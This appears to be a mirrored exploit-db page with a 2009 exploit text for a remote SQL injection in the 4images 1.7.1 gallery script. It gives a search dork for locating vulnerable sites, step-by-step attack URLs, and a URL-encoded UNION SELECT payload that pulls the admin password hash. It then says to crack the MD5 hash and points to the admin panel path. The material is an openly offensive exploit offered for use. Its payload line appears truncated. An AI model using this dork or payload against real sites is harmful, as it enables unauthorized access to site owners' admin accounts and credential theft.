bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/10572.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

34 lines
No EOL
1 KiB
Text
Raw Blame History

# Exploit Title: 4images 1.7.1 Remote SQL Injection Vulnerability
# Date: 20-12-2009
# Author: Master Mind
# Version: 1.7.1
# CVE : [N/A]
=============================================================
~ Script Name : 4images 1.7.1
~ Language : php
~ Author : Master Mind
~ Home : www.shdowskill.com , www.vbspiders.com
=============================================================
Dork : Powered By: 4images 1.7.1
./Exploit:
first search for the admin username :
ex : http://[Target.com]/path/member.php?action=showprofile&user_id=1
now we have the admin username
now we will find the password :]
ex : http://[Target.com]/path/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%2$
admin = admin username
Crack the MD5 Hash and Enjoy :)
admin panel path : http://[Target.com]/path/admin
-----------------------------------------------------------------------------------------------------------------------------$
Greets : The Electronic Bomb , Twi[L]ighT , R3D EYE, Doom[PS] , Mr.BoOoO , AND ALL MEMBERS.
Reference in a new issue View git blame Copy permalink